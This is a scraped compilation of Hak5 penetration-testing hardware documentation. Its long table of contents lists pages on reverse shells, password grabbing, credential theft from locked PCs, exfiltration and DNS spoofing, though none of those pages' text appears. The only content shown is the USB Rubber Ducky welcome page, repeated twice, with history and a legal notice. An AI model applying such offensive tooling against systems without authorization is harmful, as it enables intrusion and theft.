# Table of Contents
- [USB Rubber Ducky by Hak5 | Hak5 - USB Rubber Ducky](#usb-rubber-ducky-by-hak5-hak5-usb-rubber-ducky)
- [USB Rubber Ducky by Hak5 | Hak5 - USB Rubber Ducky](#usb-rubber-ducky-by-hak5-hak5-usb-rubber-ducky)
- [Unboxing "Quack-Start" Guide | Hak5 - USB Rubber Ducky](#unboxing-quack-start-guide-hak5-usb-rubber-ducky)
- [DuckyScript™ Quick Reference | Hak5 - USB Rubber Ducky](#duckyscript-quick-reference-hak5-usb-rubber-ducky)
- [DUCKY SCRIPT BASICS | Hak5 - USB Rubber Ducky](#ducky-script-basics-hak5-usb-rubber-ducky)
- [Hello, World! | Hak5 - USB Rubber Ducky](#hello-world-hak5-usb-rubber-ducky)
- [Keystroke Injection | Hak5 - USB Rubber Ducky](#keystroke-injection-hak5-usb-rubber-ducky)
- [Comments | Hak5 - USB Rubber Ducky](#comments-hak5-usb-rubber-ducky)
- [BASIC INPUT AND OUTPUT | Hak5 - USB Rubber Ducky](#basic-input-and-output-hak5-usb-rubber-ducky)
- [Delays | Hak5 - USB Rubber Ducky](#delays-hak5-usb-rubber-ducky)
- [The Button | Hak5 - USB Rubber Ducky](#the-button-hak5-usb-rubber-ducky)
- [The LED | Hak5 - USB Rubber Ducky](#the-led-hak5-usb-rubber-ducky)
- [Attack Modes | Hak5 - USB Rubber Ducky](#attack-modes-hak5-usb-rubber-ducky)
- [Constants | Hak5 - USB Rubber Ducky](#constants-hak5-usb-rubber-ducky)
- [Variables | Hak5 - USB Rubber Ducky](#variables-hak5-usb-rubber-ducky)
- [OPERATORS, CONDITIONS, LOOPS, AND FUNCTIONS | Hak5 - USB Rubber Ducky](#operators-conditions-loops-and-functions-hak5-usb-rubber-ducky)
- [Operators | Hak5 - USB Rubber Ducky](#operators-hak5-usb-rubber-ducky)
- [ATTACK MODES, CONSTANTS, AND VARIABLES | Hak5 - USB Rubber Ducky](#attack-modes-constants-and-variables-hak5-usb-rubber-ducky)
- [Conditional Statements | Hak5 - USB Rubber Ducky](#conditional-statements-hak5-usb-rubber-ducky)
- [Loops | Hak5 - USB Rubber Ducky](#loops-hak5-usb-rubber-ducky)
- [Functions | Hak5 - USB Rubber Ducky](#functions-hak5-usb-rubber-ducky)
- [ADVANCED FEATURES | Hak5 - USB Rubber Ducky](#advanced-features-hak5-usb-rubber-ducky)
- [Randomization | Hak5 - USB Rubber Ducky](#randomization-hak5-usb-rubber-ducky)
- [Holding Keys | Hak5 - USB Rubber Ducky](#holding-keys-hak5-usb-rubber-ducky)
- [Jitter | Hak5 - USB Rubber Ducky](#jitter-hak5-usb-rubber-ducky)
- [Payload Hiding | Hak5 - USB Rubber Ducky](#payload-hiding-hak5-usb-rubber-ducky)
- [Payload Control | Hak5 - USB Rubber Ducky](#payload-control-hak5-usb-rubber-ducky)
- [Exfiltration | Hak5 - USB Rubber Ducky](#exfiltration-hak5-usb-rubber-ducky)
- [Extensions | Hak5 - USB Rubber Ducky](#extensions-hak5-usb-rubber-ducky)
- [Lock Keys | Hak5 - USB Rubber Ducky](#lock-keys-hak5-usb-rubber-ducky)
- [TIPS & TROUBLESHOOTING | Hak5 - USB Rubber Ducky](#tips-troubleshooting-hak5-usb-rubber-ducky)
- [Conditional Compilation | Hak5 - USB Rubber Ducky](#conditional-compilation-hak5-usb-rubber-ducky)
- [Common Issues | Hak5 - USB Rubber Ducky](#common-issues-hak5-usb-rubber-ducky)
- [Tips | Hak5 - USB Rubber Ducky](#tips-hak5-usb-rubber-ducky)
- [Storage Activity | Hak5 - USB Rubber Ducky](#storage-activity-hak5-usb-rubber-ducky)
- [LAN Turtle by Hak5 | Hak5 - LAN Turtle](#lan-turtle-by-hak5-hak5-lan-turtle)
- [Packet Squirrel Mark by Hak5 | Hak5 - Packet Squirrel](#packet-squirrel-mark-by-hak5-hak5-packet-squirrel)
- [Keycroc by Hak5 | Hak5 - Key Croc](#keycroc-by-hak5-hak5-key-croc)
- [Bash Bunny by Hak5 | Hak5 - Bash Bunny](#bash-bunny-by-hak5-hak5-bash-bunny)
- [PayloadStudio | Hak5 - Payload Studio](#payloadstudio-hak5-payload-studio)
- [Shark Jack by Hak5 | Hak5 - Shark Jack](#shark-jack-by-hak5-hak5-shark-jack)
- [Bash Bunny by Hak5 | Hak5 - Bash Bunny](#bash-bunny-by-hak5-hak5-bash-bunny)
- [PayloadStudio | Hak5 - Payload Studio](#payloadstudio-hak5-payload-studio)
- [LAN Turtle by Hak5 | Hak5 - LAN Turtle](#lan-turtle-by-hak5-hak5-lan-turtle)
- [Getting Started | Hak5 - Payload Studio](#getting-started-hak5-payload-studio)
- [Faq | Hak5 - Payload Studio](#faq-hak5-payload-studio)
- [IDE Settings | Hak5 - Payload Studio](#ide-settings-hak5-payload-studio)
- [Keyboard Shortcuts | Hak5 - Payload Studio](#keyboard-shortcuts-hak5-payload-studio)
- [Editor Settings | Hak5 - Payload Studio](#editor-settings-hak5-payload-studio)
- [Compiler Settings | Hak5 - Payload Studio](#compiler-settings-hak5-payload-studio)
- [Packet Squirrel Mark by Hak5 | Hak5 - Packet Squirrel](#packet-squirrel-mark-by-hak5-hak5-packet-squirrel)
- [The Module System | Hak5 - LAN Turtle](#the-module-system-hak5-lan-turtle)
- [Overview | Hak5 - Payload Studio](#overview-hak5-payload-studio)
- [Appearance | Hak5 - Payload Studio](#appearance-hak5-payload-studio)
- [Usb Flash Disk Support | Hak5 - Packet Squirrel](#usb-flash-disk-support-hak5-packet-squirrel)
- [Default Settings | Hak5 - LAN Turtle](#default-settings-hak5-lan-turtle)
- [Editing Basics | Hak5 - Payload Studio](#editing-basics-hak5-payload-studio)
- [Default Settings | Hak5 - Packet Squirrel](#default-settings-hak5-packet-squirrel)
- [SSH Clients | Hak5 - LAN Turtle](#ssh-clients-hak5-lan-turtle)
- [Keycroc by Hak5 | Hak5 - Key Croc](#keycroc-by-hak5-hak5-key-croc)
- [LED Status Indications | Hak5 - Packet Squirrel](#led-status-indications-hak5-packet-squirrel)
- [Setting Up A New Lan Turtle | Hak5 - LAN Turtle](#setting-up-a-new-lan-turtle-hak5-lan-turtle)
- [Selecting And Adding Payloads | Hak5 - Packet Squirrel](#selecting-and-adding-payloads-hak5-packet-squirrel)
- [Installing Modules | Hak5 - LAN Turtle](#installing-modules-hak5-lan-turtle)
- [Your First Reverse Shell | Hak5 - LAN Turtle](#your-first-reverse-shell-hak5-lan-turtle)
- [LAN Turtle Basics | Hak5 - LAN Turtle](#lan-turtle-basics-hak5-lan-turtle)
- [Spoofing Dns | Hak5 - Packet Squirrel](#spoofing-dns-hak5-packet-squirrel)
- [Specifications | Hak5 - LAN Turtle](#specifications-hak5-lan-turtle)
- [Packet Squirrel Basics | Hak5 - Packet Squirrel](#packet-squirrel-basics-hak5-packet-squirrel)
- [Openvpn Payload | Hak5 - Packet Squirrel](#openvpn-payload-hak5-packet-squirrel)
- [Factory Reset | Hak5 - LAN Turtle](#factory-reset-hak5-lan-turtle)
- [Manual Upgrade | Hak5 - LAN Turtle](#manual-upgrade-hak5-lan-turtle)
- [Man In The Middle With Dns Spoof | Hak5 - LAN Turtle](#man-in-the-middle-with-dns-spoof-hak5-lan-turtle)
- [Man In The Middle With Url Snarf | Hak5 - LAN Turtle](#man-in-the-middle-with-url-snarf-hak5-lan-turtle)
- [Metasploit And Lan Turtle With Meterpreter | Hak5 - LAN Turtle](#metasploit-and-lan-turtle-with-meterpreter-hak5-lan-turtle)
- [Obtaining Credentials From A Locked Pc | Hak5 - LAN Turtle](#obtaining-credentials-from-a-locked-pc-hak5-lan-turtle)
- [Ducky Script For Packet Squirrel | Hak5 - Packet Squirrel](#ducky-script-for-packet-squirrel-hak5-packet-squirrel)
- [Persistent Shell Access With Autossh | Hak5 - LAN Turtle](#persistent-shell-access-with-autossh-hak5-lan-turtle)
- [Serial Console Access | Hak5 - Key Croc](#serial-console-access-hak5-key-croc)
- [The NETMODE Command | Hak5 - Packet Squirrel](#the-netmode-command-hak5-packet-squirrel)
- [The LED Command | Hak5 - Packet Squirrel](#the-led-command-hak5-packet-squirrel)
- [Remote File Systems With Sshfs | Hak5 - LAN Turtle](#remote-file-systems-with-sshfs-hak5-lan-turtle)
- [The Turtle Shell And Turtle Modules | Hak5 - LAN Turtle](#the-turtle-shell-and-turtle-modules-hak5-lan-turtle)
- [Connecting For The First Time | Hak5 - LAN Turtle](#connecting-for-the-first-time-hak5-lan-turtle)
- [The SWITCH Command | Hak5 - Packet Squirrel](#the-switch-command-hak5-packet-squirrel)
- [The Button Command | Hak5 - Packet Squirrel](#the-button-command-hak5-packet-squirrel)
- [Updating The Firmware | Hak5 - Key Croc](#updating-the-firmware-hak5-key-croc)
- [Included Tools | Hak5 - Packet Squirrel](#included-tools-hak5-packet-squirrel)
- [Factory Reset | Hak5 - Packet Squirrel](#factory-reset-hak5-packet-squirrel)
- [Logging Network Traffic | Hak5 - Packet Squirrel](#logging-network-traffic-hak5-packet-squirrel)
- [Factory Reset | Hak5 - Key Croc](#factory-reset-hak5-key-croc)
- [Faq | Hak5 - Packet Squirrel](#faq-hak5-packet-squirrel)
- [Power Considerations | Hak5 - LAN Turtle](#power-considerations-hak5-lan-turtle)
- [Key Croc Basics | Hak5 - Key Croc](#key-croc-basics-hak5-key-croc)
- [Getting The Packet Squirrel Online | Hak5 - Packet Squirrel](#getting-the-packet-squirrel-online-hak5-packet-squirrel)
- [First Boot And Software Update | Hak5 - LAN Turtle](#first-boot-and-software-update-hak5-lan-turtle)
- [New Features In Key Croc 1.3 | Hak5 - Key Croc](#new-features-in-key-croc-1-3-hak5-key-croc)
- [Payload Development Basics | Hak5 - Packet Squirrel](#payload-development-basics-hak5-packet-squirrel)
- [Default Settings | Hak5 - Key Croc](#default-settings-hak5-key-croc)
- [Understanding Languages | Hak5 - Key Croc](#understanding-languages-hak5-key-croc)
- [Manual Upgrade | Hak5 - Packet Squirrel](#manual-upgrade-hak5-packet-squirrel)
- [Ducky Script Commands | Hak5 - Key Croc](#ducky-script-commands-hak5-key-croc)
- [The MATCH Command | Hak5 - Key Croc](#the-match-command-hak5-key-croc)
- [The SAVEKEYS Command | Hak5 - Key Croc](#the-savekeys-command-hak5-key-croc)
- [The LED Command | Hak5 - Key Croc](#the-led-command-hak5-key-croc)
- [Firmware Recovery | Hak5 - Packet Squirrel](#firmware-recovery-hak5-packet-squirrel)
- [Getting The Key Croc Online | Hak5 - Key Croc](#getting-the-key-croc-online-hak5-key-croc)
- [Advanced Quack Commands | Hak5 - Key Croc](#advanced-quack-commands-hak5-key-croc)
- [Understanding The File System | Hak5 - Key Croc](#understanding-the-file-system-hak5-key-croc)
- [Default Settings | Hak5 - Shark Jack](#default-settings-hak5-shark-jack)
- [Writing A Simple Payload | Hak5 - Shark Jack](#writing-a-simple-payload-hak5-shark-jack)
- [Installing Extras Like Metasploit | Hak5 - Key Croc](#installing-extras-like-metasploit-hak5-key-croc)
- [Helpful Payload Snippets | Hak5 - Key Croc](#helpful-payload-snippets-hak5-key-croc)
- [Two Key Commands | Hak5 - Shark Jack](#two-key-commands-hak5-shark-jack)
- [Over The Air Upgrade | Hak5 - Shark Jack](#over-the-air-upgrade-hak5-shark-jack)
- [The NETMODE Command | Hak5 - Shark Jack](#the-netmode-command-hak5-shark-jack)
- [The BATTERY Command | Hak5 - Shark Jack](#the-battery-command-hak5-shark-jack)
- [The SWITCH Command | Hak5 - Shark Jack](#the-switch-command-hak5-shark-jack)
- [The SERIAL_WRITE Command | Hak5 - Shark Jack](#the-serial-write-command-hak5-shark-jack)
- [The LED Command | Hak5 - Shark Jack](#the-led-command-hak5-shark-jack)
- [Charge The Shark Jack From Your Phone | Hak5 - Shark Jack](#charge-the-shark-jack-from-your-phone-hak5-shark-jack)
- [Android Serial Setup For Shark Jack Cable | Hak5 - Shark Jack](#android-serial-setup-for-shark-jack-cable-hak5-shark-jack)
- [Configuration Options | Hak5 - Key Croc](#configuration-options-hak5-key-croc)
- [Included Tools | Hak5 - Shark Jack](#included-tools-hak5-shark-jack)
- [The LIST Command | Hak5 - Shark Jack](#the-list-command-hak5-shark-jack)
- [The ACTIVATE Command | Hak5 - Shark Jack](#the-activate-command-hak5-shark-jack)
- [Important Safety Information And Warnings | Hak5 - Shark Jack](#important-safety-information-and-warnings-hak5-shark-jack)
- [Unboxing And Setup | Hak5 - Shark Jack](#unboxing-and-setup-hak5-shark-jack)
- [USB Identifiers | Hak5 - Key Croc](#usb-identifiers-hak5-key-croc)
- [Password Sniffing With The Key Croc Easy Or Super Easy | Hak5 - Key Croc](#password-sniffing-with-the-key-croc-easy-or-super-easy-hak5-key-croc)
- [Upgrading Firmware | Hak5 - Packet Squirrel](#upgrading-firmware-hak5-packet-squirrel)
- [Hardware Id Cloning | Hak5 - Key Croc](#hardware-id-cloning-hak5-key-croc)
- [Payload Development | Hak5 - Key Croc](#payload-development-hak5-key-croc)
- [Files And Directory Structure | Hak5 - Key Croc](#files-and-directory-structure-hak5-key-croc)
- [Interactive Payload Development | Hak5 - Key Croc](#interactive-payload-development-hak5-key-croc)
- [Shark Jack Basics | Hak5 - Shark Jack](#shark-jack-basics-hak5-shark-jack)
- [Using Sharkjack.sh | Hak5 - Shark Jack](#using-sharkjack-sh-hak5-shark-jack)
- [The QUACK Command | Hak5 - Key Croc](#the-quack-command-hak5-key-croc)
- [Payload Development Basics | Hak5 - Shark Jack](#payload-development-basics-hak5-shark-jack)
- [Using The Shark Jack With The Plunder Bug As A Simple Switch | Hak5 - Shark Jack](#using-the-shark-jack-with-the-plunder-bug-as-a-simple-switch-hak5-shark-jack)
- [Shark Jack by Hak5 | Hak5 - Shark Jack](#shark-jack-by-hak5-hak5-shark-jack)
- [The UPDATE_PAYLOADS Command | Hak5 - Shark Jack](#the-update-payloads-command-hak5-shark-jack)
- [Specifications | Hak5 - Shark Jack](#specifications-hak5-shark-jack)
- [Firmware Recovery | Hak5 - Shark Jack](#firmware-recovery-hak5-shark-jack)
- [Manual Upgrade | Hak5 - Shark Jack](#manual-upgrade-hak5-shark-jack)
- [The Cloud C2 Commands | Hak5 - Shark Jack](#the-cloud-c2-commands-hak5-shark-jack)
- [Configuring Cloud C | Hak5 - Key Croc](#configuring-cloud-c-hak5-key-croc)
- [Mass Storage Structure | Hak5 - Bash Bunny](#mass-storage-structure-hak5-bash-bunny)
- [LED Status Indications | Hak5 - Bash Bunny](#led-status-indications-hak5-bash-bunny)
- [Installing Additional Tools | Hak5 - Bash Bunny](#installing-additional-tools-hak5-bash-bunny)
- [Installing Additional Languages | Hak5 - Bash Bunny](#installing-additional-languages-hak5-bash-bunny)
- [Switch Positions | Hak5 - Bash Bunny](#switch-positions-hak5-bash-bunny)
- [Considerations for Mark II | Hak5 - Bash Bunny](#considerations-for-mark-ii-hak5-bash-bunny)
- [DuckyScript™ On The Bash Bunny | Hak5 - Bash Bunny](#duckyscript-on-the-bash-bunny-hak5-bash-bunny)
- [QUACK | Hak5 - Bash Bunny](#quack-hak5-bash-bunny)
- [Extensions | Hak5 - Bash Bunny](#extensions-hak5-bash-bunny)
- [LED | Hak5 - Bash Bunny](#led-hak5-bash-bunny)
- [Working with the File System | Hak5 - Bash Bunny](#working-with-the-file-system-hak5-bash-bunny)
- [Contributing Best Practices | Hak5 - Bash Bunny](#contributing-best-practices-hak5-bash-bunny)
- [CPU Control | Hak5 - Bash Bunny](#cpu-control-hak5-bash-bunny)
- [VID, PID, MAN, PROD, SN | Hak5 - Bash Bunny](#vid-pid-man-prod-sn-hak5-bash-bunny)
- [Submitting Payloads | Hak5 - Bash Bunny](#submitting-payloads-hak5-bash-bunny)
- [WAIT_FOR_PRESENT | Hak5 - Bash Bunny](#wait-for-present-hak5-bash-bunny)
- [Sharing an Internet connection from Windows | Hak5 - Bash Bunny](#sharing-an-internet-connection-from-windows-hak5-bash-bunny)
- [Sharing an Internet connection from Linux | Hak5 - Bash Bunny](#sharing-an-internet-connection-from-linux-hak5-bash-bunny)
- [Sharing an Internet connection from MacOS | Hak5 - Bash Bunny](#sharing-an-internet-connection-from-macos-hak5-bash-bunny)
- [Password Reset | Hak5 - Bash Bunny](#password-reset-hak5-bash-bunny)
- [Writing Keystroke Injection Payloads for the Bash Bunny | Hak5 - Bash Bunny](#writing-keystroke-injection-payloads-for-the-bash-bunny-hak5-bash-bunny)
- [Getting Root on a Bash Bunny from the Serial Console | Hak5 - Bash Bunny](#getting-root-on-a-bash-bunny-from-the-serial-console-hak5-bash-bunny)
- [Top 5 Bash Bunny Exfiltration Payloads to "steal files" | Hak5 - Bash Bunny](#top-5-bash-bunny-exfiltration-payloads-to-steal-files-hak5-bash-bunny)
- [Payload Development Basics | Hak5 - Bash Bunny](#payload-development-basics-hak5-bash-bunny)
- [Remote Triggers for the Bash Bunny Mark II | Hak5 - Bash Bunny](#remote-triggers-for-the-bash-bunny-mark-ii-hak5-bash-bunny)
- [Bash Bunny Phishing Attack with Hamsters | Hak5 - Bash Bunny](#bash-bunny-phishing-attack-with-hamsters-hak5-bash-bunny)
- [Geofencing for the Bash Bunny Mark II | Hak5 - Bash Bunny](#geofencing-for-the-bash-bunny-mark-ii-hak5-bash-bunny)
- [Password Grabber Bash Bunny Payload | Hak5 - Bash Bunny](#password-grabber-bash-bunny-payload-hak5-bash-bunny)
- [Operating System Detection with the Bash Bunny | Hak5 - Bash Bunny](#operating-system-detection-with-the-bash-bunny-hak5-bash-bunny)
- [Bash Bunny Payload - Sudo Bashdoor on Linux | Hak5 - Bash Bunny](#bash-bunny-payload-sudo-bashdoor-on-linux-hak5-bash-bunny)
- [Bash Bunny Payload - 1990s Prank | Hak5 - Bash Bunny](#bash-bunny-payload-1990s-prank-hak5-bash-bunny)
- [Bash Bunny Dev - Behind the Scenes | Hak5 - Bash Bunny](#bash-bunny-dev-behind-the-scenes-hak5-bash-bunny)
- [Concealed Exfiltration - Pocket Network Attacks with the Bash Bunny | Hak5 - Bash Bunny](#concealed-exfiltration-pocket-network-attacks-with-the-bash-bunny-hak5-bash-bunny)
- [Bash Bunny Extensions | Hak5 - Bash Bunny](#bash-bunny-extensions-hak5-bash-bunny)
- [Reverse Shells on Linux with Bash Bunny | Hak5 - Bash Bunny](#reverse-shells-on-linux-with-bash-bunny-hak5-bash-bunny)
- [How to write Bash Bunny payloads and contribute on GitHub | Hak5 - Bash Bunny](#how-to-write-bash-bunny-payloads-and-contribute-on-github-hak5-bash-bunny)
- [Attack Mode | Hak5 - Bash Bunny](#attack-mode-hak5-bash-bunny)
- [Getting the Bash Bunny Online | Hak5 - Bash Bunny](#getting-the-bash-bunny-online-hak5-bash-bunny)
- [Updating the Bash Bunny Firmware | Hak5 - Bash Bunny](#updating-the-bash-bunny-firmware-hak5-bash-bunny)
- [Factory Reset | Hak5 - Bash Bunny](#factory-reset-hak5-bash-bunny)
- [Network Hijacking Attacks with the Bash Bunny | Hak5 - Bash Bunny](#network-hijacking-attacks-with-the-bash-bunny-hak5-bash-bunny)
- [Bash Bunny Primer | Hak5 - Bash Bunny](#bash-bunny-primer-hak5-bash-bunny)
- [Command Quick Reference | Hak5 - Key Croc](#command-quick-reference-hak5-key-croc)
- [Getting Started | Hak5 - Payload Studio](#getting-started-hak5-payload-studio)
- [Getting Started | Hak5 - Packet Squirrel](#getting-started-hak5-packet-squirrel)
- [Setup Guides | Hak5 - LAN Turtle](#setup-guides-hak5-lan-turtle)
- [Customization | Hak5 - Payload Studio](#customization-hak5-payload-studio)
- [Troubleshooting | Hak5 - Packet Squirrel](#troubleshooting-hak5-packet-squirrel)
- [Basics | Hak5 - Key Croc](#basics-hak5-key-croc)
- [Adding Devices | Hak5 - Cloud C²](#adding-devices-hak5-cloud-c-)
- [Getting Started | Hak5 - Bash Bunny](#getting-started-hak5-bash-bunny)
- [Writing Payloads | Hak5 - Bash Bunny](#writing-payloads-hak5-bash-bunny)
- [Attack Mode | Hak5 - Bash Bunny](#attack-mode-hak5-bash-bunny)
- [Software Updates | Hak5 - Bash Bunny](#software-updates-hak5-bash-bunny)
- [Trouble Shooting | Hak5 - Bash Bunny](#trouble-shooting-hak5-bash-bunny)
- [Beginner Guides | Hak5 - Bash Bunny](#beginner-guides-hak5-bash-bunny)
- [Video Guides | Hak5 - Bash Bunny](#video-guides-hak5-bash-bunny)
- [Internet Connectivity | Hak5 - Bash Bunny](#internet-connectivity-hak5-bash-bunny)
- [Files And Directory Structure | Hak5 - Key Croc](#files-and-directory-structure-hak5-key-croc)
- [Writing Payloads | Hak5 - Key Croc](#writing-payloads-hak5-key-croc)
- [Tips And Tricks | Hak5 - Key Croc](#tips-and-tricks-hak5-key-croc)
- [Beginner Guides | Hak5 - Shark Jack](#beginner-guides-hak5-shark-jack)
- [Getting Started | Hak5 - Shark Jack](#getting-started-hak5-shark-jack)
- [The ATTACKMODE Command | Hak5 - Key Croc](#the-attackmode-command-hak5-key-croc)
- [Software Updates | Hak5 - Shark Jack](#software-updates-hak5-shark-jack)
- [Writing Payloads | Hak5 - Shark Jack](#writing-payloads-hak5-shark-jack)
- [Internet Connectivity | Hak5 - Packet Squirrel](#internet-connectivity-hak5-packet-squirrel)
- [Software Updates | Hak5 - Packet Squirrel](#software-updates-hak5-packet-squirrel)
- [Managing Payloads | Hak5 - Shark Jack](#managing-payloads-hak5-shark-jack)
- [Beginner Guides | Hak5 - Key Croc](#beginner-guides-hak5-key-croc)
- [Video Guides | Hak5 - LAN Turtle](#video-guides-hak5-lan-turtle)
- [Configuration | Hak5 - Key Croc](#configuration-hak5-key-croc)
- [Product Information | Hak5 - Shark Jack](#product-information-hak5-shark-jack)
- [Troubleshooting | Hak5 - Shark Jack](#troubleshooting-hak5-shark-jack)
- [Tips And Tricks | Hak5 - Shark Jack](#tips-and-tricks-hak5-shark-jack)
- [Payload Development | Hak5 - Packet Squirrel](#payload-development-hak5-packet-squirrel)
- [Default Payloads | Hak5 - Packet Squirrel](#default-payloads-hak5-packet-squirrel)
- [Getting Started | Hak5 - LAN Turtle](#getting-started-hak5-lan-turtle)
- [Faq Troubleshooting | Hak5 - LAN Turtle](#faq-troubleshooting-hak5-lan-turtle)
- [Cloud C2 Basics | Hak5 - Cloud C²](#cloud-c2-basics-hak5-cloud-c-)
- [Cloud C² by Hak5 | Hak5 - Cloud C²](#cloud-c-by-hak5-hak5-cloud-c-)
- [Licensing And Downloads | Hak5 - Cloud C²](#licensing-and-downloads-hak5-cloud-c-)
- [Navigating The Interface | Hak5 - Cloud C²](#navigating-the-interface-hak5-cloud-c-)
- [Installation And Setup | Hak5 - Cloud C²](#installation-and-setup-hak5-cloud-c-)
- [Managing Devices | Hak5 - Cloud C²](#managing-devices-hak5-cloud-c-)
- [Quick Deployment On An Amazon Lightsail Vps | Hak5 - Cloud C²](#quick-deployment-on-an-amazon-lightsail-vps-hak5-cloud-c-)
- [Lets Encrypt Ssl Configuration And Device Enrollment | Hak5 - Cloud C²](#lets-encrypt-ssl-configuration-and-device-enrollment-hak5-cloud-c-)
- [Cloud C2 Setup With Self Signed Ssl Certificates | Hak5 - Cloud C²](#cloud-c2-setup-with-self-signed-ssl-certificates-hak5-cloud-c-)
- [Device Cannot Connect To Server | Hak5 - Cloud C²](#device-cannot-connect-to-server-hak5-cloud-c-)
- [Enabling Cloud C2 As A Service On Boot And Exfiltration | Hak5 - Cloud C²](#enabling-cloud-c2-as-a-service-on-boot-and-exfiltration-hak5-cloud-c-)
- [Upgrading Cloud C2 Editions | Hak5 - Cloud C²](#upgrading-cloud-c2-editions-hak5-cloud-c-)
- [Icon Sets | Hak5 - Cloud C²](#icon-sets-hak5-cloud-c-)
- [Installing Updates To The Cloud C2 Server | Hak5 - Cloud C²](#installing-updates-to-the-cloud-c2-server-hak5-cloud-c-)
- [Account Recovery | Hak5 - Cloud C²](#account-recovery-hak5-cloud-c-)
---
# USB Rubber Ducky by Hak5 | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
USB Rubber Ducky by Hak5
========================
Welcome [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/#welcome)
-----------------------------------------------------------------------
This guide covers USB Rubber Ducky™ hardware mark I (2011) and II (2022), as well as DuckyScript™ version 1.0 (2011) and 3.0 (2022).
warning
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
report
**DO NOT FLASH**. The limited warranty does not cover damage caused by firmware flash. Flashing legacy or third-party firmware will render the device irrecoverable. The new USB Rubber Ducky is architected in conjunction with Payload Studio such that firmware flashing will never be required. Disregard articles related to the old USB Rubber Ducky and rely solely on the official documentation here at [docs.hak5.org](https://docs.hak5.org/)
.
About the USB Rubber Ducky [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/#about-the-usb-rubber-ducky)
-------------------------------------------------------------------------------------------------------------

New USB Rubber Ducky
Hak5 introduced _Keystroke Injection_ in 2010 with the USB Rubber Ducky™. This technique, developed by Hak5 founder Darren Kitchen, was his tool of choice for automating mundane tasks at his IT job — fixing printers, network shares and the like.
Today the USB Rubber Ducky is a hacker culture icon, synonymous with the keystroke injection technique it pioneered. It’s found its way into the hearts and toolkits of Cybersecurity and IT pros the world over — including many movies and TV shows!
Core to its success is its simple language, DuckyScript™. Originally just three commands, it could be learned by anyone—regardless of experience—in minutes.
Now in version 3.0, DuckyScript is a feature rich structured programming language. It’s capable of the most complex attacks, all while keeping it simple.
Following this guide you will learn and build on your knowledge — from keystroke injection to variables, flow control logic and advanced features. As you do, you’ll unlock ever more creative potential from your USB Rubber Ducky! Quack on!
What’s New In DuckyScript 3.0? [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/#whats-new-in-duckyscript-30)
------------------------------------------------------------------------------------------------------------------
DuckyScript 1.0, developed by Hak5 in 2010, is a macro scripting language. It sequentially processes one of two actions: keystroke injection (type a set of keys), and delay (momentarily pause). These actions, written in what is known as a payload, instruct the USB Rubber Ducky on what to do. Either type, or pause.
Over the years the DuckyScript language has evolved to include device specific commands. With the introduction of the Bash Bunny in 2017, DuckyScript was coupled with the shell scripting language BASH. Leveraging the Linux base, these DuckyScript payloads allowed the device to perform multi-vector USB attacks.
Similarly, DuckyScript was included in the Shark Jack to probe Ethernet networks. The Key Croc uses DuckyScript 2.0 to execute a myriad of hotplug attacks based on live keylogging data. Even third party tools designed in partnership with Hak5 licensed DuckyScript — notably the O.MG Platform of malicious cables and adapters by Mischief Gadgets.
With the new USB Rubber Ducky in 2022, DuckyScript 3.0 has been introduced.
DuckyScript 3.0 is a feature rich, structured programming language. It includes all of the previously available commands and features of the original DuckyScript.
Additionally, DuckyScript 3.0 introduces control flow constructs (if/then/else), repetition (while loops), functions, extensions.
Plus, DuckyScript 3.0 includes many features specific to keystroke injection attack/automation, such as HID & Storage attack modes, Keystroke Reflection, jitter and randomization to name a few.
This documentation will cover the basics, then introduce each of the new features such that they build upon one another.
Legal [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/#legal)
-------------------------------------------------------------------
USB Rubber Ducky and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.
USB Rubber Ducky and DuckyScript are subject to the [Hak5 license agreement](https://hak5.org/license)
([https://hak5.org/license](https://hak5.org/license)
)
DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, [contact us](https://support.hak5.org/)
. Please report counterfeits and brand abuse to [legal@hak5.org](mailto:legal@hak5.org)
.
This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.
Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
* * *
[DuckyScript™ Quick Reference _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-quick-reference/)
---
# USB Rubber Ducky by Hak5 | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Welcome
_article_
USB Rubber Ducky by Hak5
========================
Welcome [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/usb-rubber-ducky-by-hak5/#welcome)
------------------------------------------------------------------------------------------------
This guide covers USB Rubber Ducky™ hardware mark I (2011) and II (2022), as well as DuckyScript™ version 1.0 (2011) and 3.0 (2022).
warning
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
report
**DO NOT FLASH**. The limited warranty does not cover damage caused by firmware flash. Flashing legacy or third-party firmware will render the device irrecoverable. The new USB Rubber Ducky is architected in conjunction with Payload Studio such that firmware flashing will never be required. Disregard articles related to the old USB Rubber Ducky and rely solely on the official documentation here at [docs.hak5.org](https://docs.hak5.org/)
.
About the USB Rubber Ducky [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/usb-rubber-ducky-by-hak5/#about-the-usb-rubber-ducky)
--------------------------------------------------------------------------------------------------------------------------------------

New USB Rubber Ducky
Hak5 introduced _Keystroke Injection_ in 2010 with the USB Rubber Ducky™. This technique, developed by Hak5 founder Darren Kitchen, was his tool of choice for automating mundane tasks at his IT job — fixing printers, network shares and the like.
Today the USB Rubber Ducky is a hacker culture icon, synonymous with the keystroke injection technique it pioneered. It’s found its way into the hearts and toolkits of Cybersecurity and IT pros the world over — including many movies and TV shows!
